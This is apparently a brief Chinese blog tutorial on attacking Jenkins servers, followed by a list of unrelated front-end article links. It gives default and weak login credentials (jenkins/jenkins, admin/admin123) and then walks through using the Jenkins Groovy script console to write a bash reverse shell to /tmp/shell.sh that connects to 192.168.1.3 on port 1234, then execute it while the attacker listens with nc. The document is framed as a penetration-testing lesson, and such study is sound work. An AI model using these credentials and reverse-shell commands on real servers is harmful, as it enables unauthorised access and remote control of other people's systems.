web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins

使用admin/admin123登陆成功

Jenkins反弹shell


格式为 println"命令".execute().text

在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句

new File("/tmp/shell.sh").write('bash -i >& /dev/tcp/192.168.1.3/1234 0>&1'

println "ls-al/tmp/shell.sh".execute().text

攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text

相关推荐
吃瓜群众i22 分钟前
理解Javascript闭包
前端·javascript
安大桃子26 分钟前
Mapbox GL + Deck.gl 三维实战:Mapbox 加载 Tileset3D 倾斜摄影模型
前端·webgl
yede29 分钟前
多行文本省略号显示,更多按钮展开全部
前端
就是我31 分钟前
React 应用性能优化实战
前端·react.js·性能优化
G扇子34 分钟前
深入解析XSS攻击:从原理到防御的全方位指南
前端·安全
snakeshe101039 分钟前
入解析React性能优化策略:eagerState的工作原理
前端
六边形66640 分钟前
Vue中的 ref、toRef 和 toRefs 有什么区别
前端·vue.js·面试
kovli40 分钟前
红宝书第十八讲:详解JavaScript的async/await与错误处理
前端·javascript
前端付豪41 分钟前
🚀 React 应用国际化实战:深入掌握 react-i18next 的高级用法
前端·react.js·架构
代码小学僧41 分钟前
使用 Cloudflare workers 做一个定时发送消息的飞书机器人
前端·云原生·serverless